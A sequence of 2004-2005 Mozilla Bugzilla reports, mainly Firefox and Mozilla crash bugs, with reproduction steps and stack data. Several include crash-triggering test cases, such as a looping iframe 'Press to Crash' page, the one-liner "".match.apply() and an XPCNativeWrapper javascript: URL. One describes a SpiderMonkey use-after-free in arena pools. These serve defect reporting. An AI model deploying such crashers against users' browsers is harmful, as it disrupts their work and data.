gklayout.dll!nsJSContext::CallEventHandler(JSObject * aTarget=0x0301b238,
JSObject * aHandler=0x0301b250, unsigned int argc=1, long * argv=0x0012e1d8,
long * rval=0x0012e1e0) Line 1297 + 0x21 C++
gklayout.dll!nsJSEventListener::HandleEvent(nsIDOMEvent * aEvent=0x06390ea8)
Line 175 + 0x2b C++
gklayout.dll!nsXBLPrototypeHandler::ExecuteHandler(nsIDOMEventReceiver *
aReceiver=0x03006290, nsIDOMEvent * aEvent=0x06390ea8) Line 463 C++
gklayout.dll!nsXBLWindowHandler::WalkHandlersInternal(nsIDOMEvent *
aEvent=0x06390ea8, nsIAtom * aEventType=0x00e74d08, nsXBLPrototypeHandler *
aHandler=0x06557188) Line 297 + 0x18 C++
gklayout.dll!nsXBLWindowKeyHandler::WalkHandlers(nsIDOMEvent *
aKeyEvent=0x06390ea8, nsIAtom * aEventType=0x00e74d08) Line 196 C++
gklayout.dll!nsXBLWindowKeyHandler::KeyPress(nsIDOMEvent *
aKeyEvent=0x06390ea8) Line 249 C++
gklayout.dll!DispatchToInterface(nsIDOMEvent * aEvent=0x06390ea8,
nsIDOMEventListener * aListener=0x02dc18a0, unsigned int (nsIDOMEvent *)*
aMethod=0x01d92600, const nsID & aIID={...}, int * aHasInterface=0x0012ea88)
Line 127 + 0xb C++
gklayout.dll!nsEventListenerManager::HandleEvent(nsIPresContext *
aPresContext=0x02a8cba0, nsEvent * aEvent=0x0012f2c8, nsIDOMEvent * *
aDOMEvent=0x0012ef38, nsIDOMEventTarget * aCurrentTarget=0x02a20274, unsigned
int aFlags=514, nsEventStatus * aEventStatus=0x0012f0f0) Line 1524 + 0x23 C++
gklayout.dll!nsXULDocument::HandleDOMEvent(nsIPresContext *
aPresContext=0x02a8cba0, nsEvent * aEvent=0x0012f2c8, nsIDOMEvent * *
aDOMEvent=0x0012ef38, unsigned int aFlags=514, nsEventStatus *
aEventStatus=0x0012f0f0) Line 1261 C++
gklayout.dll!nsXULElement::HandleDOMEvent(nsIPresContext *
aPresContext=0x02a8cba0, nsEvent * aEvent=0x0012f2c8, nsIDOMEvent * *
aDOMEvent=0x0012ef38, unsigned int aFlags=519, nsEventStatus *
aEventStatus=0x0012f0f0) Line 2864 + 0x36 C++
gklayout.dll!PresShell::HandleEventInternal(nsEvent * aEvent=0x0012f2c8,
nsIView * aView=0x02aaba00, unsigned int aFlags=1, nsEventStatus *
aStatus=0x0012f0f0) Line 6084 + 0x37 C++
gklayout.dll!PresShell::HandleEvent(nsIView * aView=0x02aaba00, nsGUIEvent *
aEvent=0x0012f2c8, nsEventStatus * aEventStatus=0x0012f0f0, int aForceHandle=1,
int & aHandled=1) Line 5921 + 0x19 C++
gklayout.dll!nsViewManager::HandleEvent(nsView * aView=0x02aaba00, nsGUIEvent
* aEvent=0x0012f2c8, int aCaptured=0) Line 2280 C++
gklayout.dll!nsViewManager::DispatchEvent(nsGUIEvent * aEvent=0x0012f2c8,
nsEventStatus * aStatus=0x0012f224) Line 2066 + 0x14 C++
gklayout.dll!HandleEvent(nsGUIEvent * aEvent=0x0012f2c8) Line 77 C++
gkwidget.dll!nsWindow::DispatchEvent(nsGUIEvent * event=0x0012f2c8,
nsEventStatus & aStatus=nsEventStatus_eIgnore) Line 1067 + 0xa C++
gkwidget.dll!nsWindow::DispatchWindowEvent(nsGUIEvent * event=0x0012f2c8)
Line 1088 C++
gkwidget.dll!nsWindow::DispatchKeyEvent(unsigned int aEventType=131, unsigned
short aCharCode=111, unsigned int aVirtualCharCode=0, long aKeyData=0) Line
2978 + 0xf C++
gkwidget.dll!nsWindow::OnChar(unsigned int mbcsCharCode=15, unsigned int
virtualKeyCode=0, bool isMultiByte=false) Line 3165 C++
gkwidget.dll!nsWindow::ProcessMessage(unsigned int msg=258, unsigned int
wParam=15, long lParam=1572865, long * aRetValue=0x0012f77c) Line 3880 + 0x22 C++
gkwidget.dll!nsWindow::WindowProc(HWND__ * hWnd=0x001f0218, unsigned int
msg=258, unsigned int wParam=15, long lParam=1572865) Line 1349 + 0x1b C++
Reproducible: Always
Steps to Reproduce:
|
|
293,388 | 2,496,761 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050508
When innerHTML of a div is overwrited by innerHTML of a iframe, the loading icon
starts and can't be stoped, on multiple tryes browser can crash.
I have created a loop function what call the function multiple times, to crash
the browser..
The main problem is the loading icon.. I really need that script for my site(i
trying to create a iframe with dynamic width&height)..
Reproducible: Sometimes
Steps to Reproduce:
1. Execute the function what overwrite the DIV innerHTML (after that, the
loading icon starts and can't be stoped)
2. Execute multiple times.. You can do that with a loop.. (See my url)
3.
Actual Results:
Firstly the loadin animation can't be stopped..
If you repeat multiple times, browser can crash.
Expected Results:
The loading animation should stop after loading
Browser shouldn't crash
Here is ff_crash.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<title>Crasher</title>
</head><body>
<div id="dynamicdiv">
<iframe onLoad="insertIt();" name="dynamicframe" scrolling="no" frameborder="0"
src="blank.html" height="100%" width="100%"></iframe>
</div>
<script language="JavaScript">
function insertIt() {
var _y = document.getElementById('dynamicdiv');
var _x = window.frames[0].document.body.innerHTML;
_y.innerHTML = _x;
}
function makeIframe() {
var newIframe = document.createElement('iframe');
newIframe.onload = function() { insertIt(); }
newIframe.name ='dynamicframe';
newIframe.scrolling='no';
newIframe.frameborder='0';
newIframe.src ='blank.html';
newIframe.height='100%';
newIframe.width='100%';
document.getElementById('dynamicdiv').appendChild(newIframe);
}
function Loop() {
for(i = 1; i <= 30; i++) makeIframe();
}
</script>
<a onclick="Loop();">Press to Crash</a>
</body</body></html>
Another version.. Also cause to crash..
Insted of function makeIframe() {
var newIframe = document.createElement('iframe');
newIframe.onload = function() { insertIt(); }
newIframe.name ='dynamicframe';
newIframe.scrolling='no';
newIframe.frameborder='0';
newIframe.src ='blank.html';
newIframe.height='100%';
newIframe.width='100%';
document.getElementById('dynamicdiv').appendChild(newIframe);
}
Also can be ussed..
function makeIframe() {
var _y = document.getElementById('dynamicdiv');
_y.innerHTML = '<iframe onLoad="insertIt();" name="dynamicframe" scrolling="no"
frameborder="0" src="blank.html" height="100%" width="100%"></iframe>';
}
Same too be same resultat..
Here is Mozilla crash info.. A bit long.. Oh.. Too long.. If you still need it,
send me a email..
Application Information
Application Launch Time
08.05.2005 18:19
Build Identifier
2005050805
Deployment Identifier
MozillaOrgMozillaTrunkWin322005050805
Interface Version
8 (0x00000008)
Monitor Configuration Version
1 (0x00000001)
Platform Identifier
Win32
Product Identifier
MozillaTrunk
Talkback Configuration Version
1 (0x00000001)
Talkback Library Version
7 (0x00000007)
Vendor Identifier
MozillaOrg
Runtime Information
Active Application
2084 (0x00000824)
Command Line
"C:\Program Files\mozilla.org\Mozilla\Mozilla.exe" -installer
Contents of the Stack
[ 0] 10 10 00 00 00 10 00 00 B0 53 12 00 00 10 00 00 [.........S......]
[ 10] A8 5A E8 01 00 00 00 00 80 CA A3 00 00 00 00 00 [.Z..............]
[ 20] F4 53 12 00 B3 BB 26 60 00 00 00 00 64 10 11 61 [.S....&`....d..a]
[ 30] 00 EE 32 01 00 00 00 00 F0 C7 E8 01 01 00 00 00 [..2.............]
[ 40] 74 AB E8 01 00 00 00 00 00 26 E2 01 8F 70 15 60 [t........&...p.`]
[ 50] 00 00 00 00 10 54 12 00 6F 51 2A 60 70 AB E8 01 [.....T..oQ*`p...]
[ 60] 00 00 00 00 00 EE 32 01 14 CB CF 01 00 26 E2 01 [......2......&..]
[ 70] 68 54 12 00 6D 12 29 60 A8 5A E8 01 88 1C B5 01 [hT..m.)`.Z......]
[ 80] 2C 12 C3 01 18 50 E5 01 00 00 00 00 33 C7 25 60 [,....P......3.%`]
[ 90] 00 00 00 00 2C 12 C3 01 00 EE 32 01 10 12 C3 01 [....,.....2.....]
[ A0] 6C 54 12 00 88 1C B5 01 00 00 00 00 00 00 00 00 [lT..............]
[ B0] 01 00 00 00 00 00 00 00 18 50 E5 01 C8 ED 32 01 [.........P....2.]
[ C0] 50 50 E5 01 14 CB CF 01 88 54 12 00 7C 0F 29 60 [PP.......T..|.)`]
[ D0] 00 EE 32 01 01 00 00 00 2C 12 C3 01 18 50 E5 01 [..2.....,....P..]
[ E0] 2C 12 C3 01 00 00 00 00 A4 54 12 00 02 07 27 60 [,........T....'`]
[ F0] 18 50 E5 01 00 00 00 00 00 EE 32 01 B8 EC 32 01 [.P........2...2.]
[ 100] C8 AC E1 01 B4 55 12 00 D5 CA 25 60 18 50 E5 01 [.....U....%`.P..]
[ 110] 00 00 00 00 00 EE 32 01 10 12 C3 01 88 12 C3 01 [......2.........]
[ 120] B8 E7 BD 01 58 BC CE 01 00 00 00 00 58 BC CE 01 [....X.......X...]
[ 130] 34 98 11 60 C9 C3 C2 77 00 00 27 00 00 00 00 00 [4..`...w..'.....]
.............
[ 60] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
[ 70] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
[ 80] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
[ 90] 00 00 00 00 [....]
Thanks guys ;)
I'm from Moldova (if that matter ;o)
If you have a workarround.. Please let me know.. I need a solution to make that
code work properly on all browsers(on IE works just fine).. Need an
autoresizeble iframe..
|
|
294,195 | 2,502,158 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Using substr() method on string containing references to elements matched by
regular expression crashes Firefox.
Reproducible: Always
Steps to Reproduce:
1. Call replace() method on a string in JS script in a similar way as shown on
test page
Actual Results:
Browser crashes
Expected Results:
Definitely not crash.
|
|
294,235 | 2,502,350 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050515 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050515 Firefox/1.0+
On loading http://www.powweb.com/ Firefox seems to get stuck halfway through
loading the page. Either it just hangs or completely crashes.
Reference conversation on Mozillazine:
http://forums.mozillazine.org/viewtopic.php?t=265680
Reproducible: Always
Steps to Reproduce:
1. Type www.powweb.com in location bar
2. Wait for it to load
3.
Actual Results:
Firefox crashes
Expected Results:
Page should load normally or catch error.
|
|
295,052 | 2,508,083 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 (ax)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 (ax)
The following Javascript code will crash both Firefox and Mozilla:
"".match.apply()
Reproducible: Always
Steps to Reproduce:
Type the following code into a webpage or the Javascript console and execute it:
"".match.apply()
Actual Results:
Mozilla / Firefox crashes.
Expected Results:
It should have executed the match method.
I've tested this with Firefox 1.04 and Mozilla 1.7.1 on Windows XP.
In Mozilla 1.7.1:
AppName: mozilla.exe AppVer: 1.7.20040.5185 ModName: js3250.dll
ModVer: 4.0.0.0 Offset: 0003ca05
In Firefox 1.0.4:
Will add crash report in comment.
|
|
295,430 | 2,510,860 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8b2) Gecko/20050524 Firefox/1.0+ (2005052406)
Reproducible: Always
Steps to Reproduce:
1. navigate the browser to
javascript: XPCNativeWrapper.prototype.toString();
Actual Results:
the browser crashes.
Expected Results:
do not crash and display the string value of XPCNativeWrapper.prototype.
FIREFOX caused an invalid page fault in
module FIREFOX.EXE at 015f:00419f55.
|
|
283,562 | 2,425,214 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Software error:
Insecure dependency in parameter 3 of DBI::db=HASH(0x8f3c9f8)->selectrow_array
method call while running with -T switch at Bugzilla/User.pm line 1016.
in 2.19.2 development release
Reproducible: Always
Steps to Reproduce:
1.Home Page
2.New Account
3. Fill email and name and create account
Actual Results:
Software error:
Insecure dependency in parameter 3 of DBI::db=HASH(0x8f3c9f8)->selectrow_array
method call while running with -T switch at Bugzilla/User.pm line 1016.
Expected Results:
Should have created the user and sent email with password
|
|
295,670 | 2,512,544 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050526 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050526 Firefox/1.0+
On http://www.demonhunter.net if you click "media" it will crash browser (3/4 of
the time)
Reproducible: Sometimes
Steps to Reproduce:
1. Goto www.demonhunter.net
2. Click Media in the menu
3. Click it again if nothing happens
Actual Results:
Crashes browser.
Expected Results:
Not crash.
|
|
296,528 | 2,518,501 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
When I drag a file from an FTP site (that I have read/write access to) into
Mozilla Firefox, it deletes it from the FTP without asking!!! This has
happened with any version of Firefox I have used.
Reproducible: Always
Steps to Reproduce:
1. Log into an FTP site using either Windows Explorer or Internet Explorer
2. Find a file that you wish to view in Firefox
3. Drag the file from the Explorer window into Firefox
4. Watch your file disappear from Explorer!
5. Refresh the Explorer window, and the file is not there. It has been deleted
off the server.
Actual Results:
The file was deleted off the FTP
Expected Results:
If I drag a local file from my hard drive into Firefox, it loads it. If I run
IE, and drag a file from an FTP into it, it loads the page from the FTP. This
is what Firefox should do too. I have no problem logging in a second time to
the FTP through Firefox...I just don't like it deleting my files :).
|
|
297,079 | 2,522,386 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050608 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050608 Firefox/1.0+
If you have the ScrapBook extension installed and you perform a particular click
sequence, Deer Park Alpha 1 will crash.
Note: You will need to follow these instructions *precisely* to be able to
reproduce this. It is reproducibly, but only with certain specific sequences of
actions (right down to the mouse click and location of clicking).
Firefox 1.0.4 is not affected. Reproduced with ScrapBook versions 0.15.3 or
0.15.4 (latest)
Reproducible: Always
Steps to Reproduce:
1. Install Firefox Deer Park Alpha 1
2. Create a new profile and install ScrapBook - either 0.15.3 or 0.15.4 (latest)
3. After restarting to browser, select Tools --> SrapBook
4. Now is when you need to be precise:
5. In the ScrapBook side panel, single click (and release) the search icon so
that the menu pops up
6. While that menu is still up, move your mouse pointer to a blank region on the
Firefox main menu bar and single click (and release)
7. Select Tools --> ScrapBook
8. At this point, Firefox should have crashed.
Actual Results:
Firefox crashed
Expected Results:
The ScrapBook sidebar should have disappeared, and Firefox should not have crashed.
I originally reported this to the ScrapBook extension developer, on June 3;
however, I have received no feedback. It is difficult for me to tell if this is
a purely ScrapBook issue or if this is a case where a particular combination has
revealed a flaw in Deer Park.
OS version:
Microsoft Windows XP, SP2 + all patches
Reporduced with latest trunk: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8b2) Gecko/20050608 Firefox/1.0+
|
|
255,715 | 2,233,676 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040207 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040207 Firefox/0.8
When we link a web page to a XBL file with a binding element with no id, Mozilla
crashes.
A testcase is given by the URL :
The XBL file contains :
<?xml version="1.0"?>
<xbl:bindings xmlns:xbl="http://www.mozilla.org/xbl">
<xbl:binding id="b" />
<xbl:binding />
</xbl:bindings>
If we add an `id="b2"` to the last xbl:binding, there is no more crash.
And even if you add `xbl:id="b2"` the browser still crashes...
Reproducible: Always
Steps to Reproduce:
1. Open a page linked with a XBL file with a binding element without id attribute
Actual Results:
Crash
Expected Results:
No crash
Verified with Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.2) Gecko/20040813
Firefox/0.9.1+,
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.6) Gecko/20040207 Firefox/0.8,
and Mozilla 1.8a3 Linux
TalkBack : TB569654X
|
|
256,108 | 2,236,534 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040816 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040816 Firefox/0.9.1+
It could be reproduced on Firefox nightly with Gecko 1.7.2, and Mozilla 1.8alpha3.
Reproducible: Always
Steps to Reproduce:
1. Go to http://literarymoose.info/
2. View -> Use Style -> None.
3. Crashes.
|
|
256,642 | 2,240,012 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Build Identifier: N.A.
We have found that the following two lines in JS_ArenaFreeAllocation expoes
the spidermonkey of deallocations of unpredictable nature.
if (pool->current == a)
pool->current = &pool->first;
After repositioning the current pool pointer we may come to a situation in
which we have managed to allocate a number of bytes by using free bytes in
already allocated arenas in the tempPool, without having to allocate new
memory, nor having needed to fetch a new pool from the set of free arenas.
If this happens we will possibly deallocate memory that is still in use.
This is because cg2mark which is stored in TOK_FUNCTION of emitTree will point
to a pool which is not the last arena in the pool but rarher a arena in which
a sufficient number of bytes have been found that allows us to store the
needed structures. The result after having emitted the function body is that
the tempPool is pruned from c2gmark, which will mean that active memory may be
deallocated.
Reproducible: Always
Steps to Reproduce:
It is very hard to describe the precise reproduction steps, the crash is
dependant on a number of different factors such as: the DEBUG configuration
set, what kind of native memory allocation algorithm is implemented, and the
configuration of the target environment such as arena sizes.
Actual Results:
I have seen: ZPEs, Asserts in interpritation, as well as OS memory exceptions.
Expected Results:
Instead of the two lines in JS_ArenaFreeAllocation, however ambitious they are
in concerning using any remaining bytes in the allocated areanas, it seems
that we must repostion to the last arena to avoid the described problems.
N.A.
|
|
260,541 | 2,266,500 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10
Browser go boom due to poor coding ( self-referencing objects when the JS engine
probably expected a string...)
Reproducible: Always
Steps to Reproduce:
1. Enable Javascript
2. Load a page with code such as
var myErr = new Error( "Error Text" );
myErr.name = myErr;
3. Watch the Mozilla Talkback client do it's thing.
Actual Results:
The browser crashed.
Expected Results:
The browser should have laughed at my poor coding ability and moved along.
TB896851K is the most specific.
TB895978Q and TB895966E were sent before I tracked down the problem.
|
|
260,771 | 2,267,704 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a4) Gecko/20040919
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a4) Gecko/20040919
When editing an existing web document [we use a lot of templates with blockquote
here], the composer will freeze, then cause a general crash when using
blockquote to indent sections of a document.
This happens when the browser is also open with pages with heavy graphic content.
Reproducible: Always
Steps to Reproduce:
1. Enter and existing html document in Composer
2. Attempt to use the keyboard Blockquote function
3. Entire Mozilla suite locks up and sends a report to Microsoft
Actual Results:
we get a lockup with a loss of everything since the last save. [We then curse
and scream because sometimes we've lost part of a story!]
Expected Results:
Indented the paragraph or section of the document
The software just returns a not responding error, then XP takes over and closes
the entire Suite.
We are running XP Pro with 1 GB of RAM and SP2 installed.
|
|
263,846 | 2,289,918 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2
Click on "actueel" above the website http://www.hema.nl
Firefox crashes and Netscape error message pop up.
No idea why.
Reproducible: Always
Steps to Reproduce:
1. visit www.hema.nl
2. click on "actueel" above
3. crash.
After restart FF: All icons in Bookmarks toolbar Folders are removed --> blanc
icon (default)
|
|
264,873 | 2,297,610 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040910
guess the same as https://bugzilla.mozilla.org/show_bug.cgi?id=239563 , but on
tab press
Reproducible: Always
Steps to Reproduce:
1. open a window using window.open
2. make sure the popup contains OnBlur="javascript:window.close()"
3. press TAB having the popup focussed
Actual Results:
mozilla exited, error occured
Expected Results:
window close or stay, dont really matter
tried on 1.7.2, 1.7.3 and 2 other pc's
|
|
257,818 | 2,248,538 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3) Gecko/20040902 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3) Gecko/20040902 Firefox/0.9.1+
When visiting that site, the browser crashes/get into an infinite loop.
It is a regression. This does not happen in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3) Gecko/20040811
Firefox/0.9.1+
It happens in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3) Gecko/20040812
Firefox/0.9.1+
A Talkback ID I got is: TB717956X
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:
Crash/infinite loop/freeze
Expected Results:
Just load the page
|
|
261,798 | 2,274,717 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040207 Firefox/0.8
Build Identifier: http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.3/
When the method CSSStyleSheet::insertRule is called with an empty string as the
CSS rule, the browser crashes (tested with Mozilla 1.7.3 and Firefox 1.0PR).
Reproducible: Always
Steps to Reproduce:
1. Open the file attached to this bug report with either Mozilla or Firefox.
Actual Results:
Crash.
Expected Results:
The JavaScript console should display an error (DOMException SYNTAX_ERR).
|
|
263,365 | 2,286,594 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040913 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040913 Firefox/0.10.1
If I try to print preview the location map of the Leeds/Morley centre, Firefox
crashes.
Reproducible: Always
Steps to Reproduce:
1. Open http://mypetstopdenton.co.uk
2. Click "Your nearest centre"
3. Click "MyPetStop Morley"
4. Click "Location Map"
5. Click Print Preview
Actual Results:
Firefox hangs
Expected Results:
Preview the image and not hang.
default theme.
nVidia 4200Ti graphics card
drivers 61.77
|
|
265,692 | 2,303,365 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20041022 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20041022 Firefox/1.0
Mousing over an image link does not show the url in the status bar.
Reproducible: Always
Steps to Reproduce:
1. Go to http://slashdot.org/
2. Mouse over the slashdot logo at the top left (or any other image link)
Actual Results:
URL is not displayed in the firefox status bar
Expected Results:
URL is displayed in the firefox status bar
This bug does not appear in the 20041020 aviary build, but it does appear in
20041022.
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20041022 Firefox/1.0
|
|
265,740 | 2,303,748 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
browser crashes some times when loading gmail and loading another tab
Reproducible: Always
Steps to Reproduce:
1.load firefox without home page (about:blank)
2.open using link gmail (www.gmail.com)
3.while loading load different address in same/different tab
Actual Results:
error messege - crash
Expected Results:
worked . . .
|
|
273,458 | 2,353,998 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a6) Gecko/20041203
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a6) Gecko/20041203
Sometimes, and only sometimes, Composer crashes if I CTRL+END. I haven't found
any other pattern yet.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
|
|
268,119 | 2,319,688 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a5) Gecko/20041106 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a5) Gecko/20041106 Firefox/0.9.1+
See upcoming testcase.
The url did crash for me once, but is not really easy reproducable.
It seems a regression:
It doesn't happen with:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a5) Gecko/20041007
Firefox/0.9.1+ 7:21am
It happens with:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a5) Gecko/20041008
Firefox/0.9.1+ 6:12am
Bonsai link of that period:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&module=all&branch=HEAD&branchtype=match&dir=&file=&filetype=match&who=&whotype=match&sortby=Date&hours=2&date=explicit&mindate=2004-10-07+07%3A00%3A00&maxdate=2004-10-08+07%3A00%3A00&cvsroot=%2Fcvsroot
A Talkback report:
http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=2&type=iid&id=TB1761978M
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
|
|
279,697 | 2,395,766 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8a6) Gecko/20050111
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8a6) Gecko/20050111
In instance:
<binding id="binding1">
<implementation>
<getter>
</getter>
</implementation>
</binding>
Reproducible: Always
Steps to Reproduce:
|
|
280,769 | 2,403,871 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
If the Number of Strings compared in the regular expression, ie:
Newington|Abbeville|Abbotsford| .....
is more than a certain number, firefox will crash.
On my machine that number happens to be exactly 2729. Comparing
2730 values will crash Firefox everytime.
The attachment page provided, contains a regex comparing 2729 values,
the last entry being 'x'. changing the last entry to 'xa' or will crash
firefox.
Reproducible: Always
Steps to Reproduce:
1. Open Attachment Webpage in Firefox.
2. Copy the Address at the bottom of the page and paste it into the TextArea.
3. Click the "Check" Button.
4. If firefox does not Crash, Try editing the script and increase the number
of elements compared in the Regular Expression.
5. The attachment page provided, contains a regex comparing 2729 values,
the last entry being 'x'. changing the last entry to 'xa' crashes firefox
on my machine.
Actual Results:
Crashed
Expected Results:
should alert the user if the string is matched. (works fine in browsers)
|
|
281,173 | 2,406,895 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b) Gecko/20050204 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b) Gecko/20050204 Firefox/1.0+
chance of crash when scrolling on this page, only with smooth scrolling enabled.
Reproducible: Sometimes
Steps to Reproduce:
1. With the latest Beast build, create a new profile.
2. Set Tools > Options > Advanced to use Smooth Scrolling.
3. Go to http://www.arellanes.com/wordpress/index.php?m=200307
4. Position the mouse pointer so it will be over the main article (the white
background) not the magnolia background that's to the left and right of the main
article.
5. Whilst the page is loading & rendering, use the mouse-wheel to keep scrolling
up & down really quickly. It doesn't matter if you don't scroll very far into
the page, as long as whilst it's rendering the page is moving up and down a lot.
If this doesn't work, try clearing the cache of your new profile and following
steps 3-5 again.
I get a 50% chance of a crash when following the above steps.
I use a MS Intellimouse 4 which has a mouse-wheel that is properly analogue. ie:
it's not 'notched' like othermice. I don't know if this exacerbates the problem.
I also have a relatively slow connection (64kbps up, 300kbps down) - don't know
if this makes the crash more likely either.
Actual Results:
Firefox can crash
Expected Results:
Firefox shouldn't crash
Win2k SP4 With Intellipointer 5.2 drivers for MS Intellimouse 4.0a
The moouse wheel isn't notched - it is totally smooth. Reproducing the crash
happend 50% of the time with a mouse like this. The bug appears to be harder to
reproduce if you don't have a smooth mouse wheel.
Could this be a bug with the mouse drivers rather than firefox's fault?
Talkback IDs: TB3493149K, 3507089
Forum thread: http://forums.mozillazine.org/viewtopic.php?t=212735
|
|
281,424 | 2,408,901 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b) Gecko/20050207 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b) Gecko/20050207 Firefox/1.0+
In the FoxyTunes extension (http://www.foxytunes.org) there is a button (the
button with a musical note) which when hovered over displays a popup.
In the latest Firefox nightlies this causes a crash.
The crash can be easily reproduced if you hover over the button several times.
Reproducible: Always
Steps to Reproduce:
1. Install FoxyTunes 1.1 from http://www.foxytunes.org
2. Hover over the 'info' button for a few times
Actual Results:
Browser crash
|
|
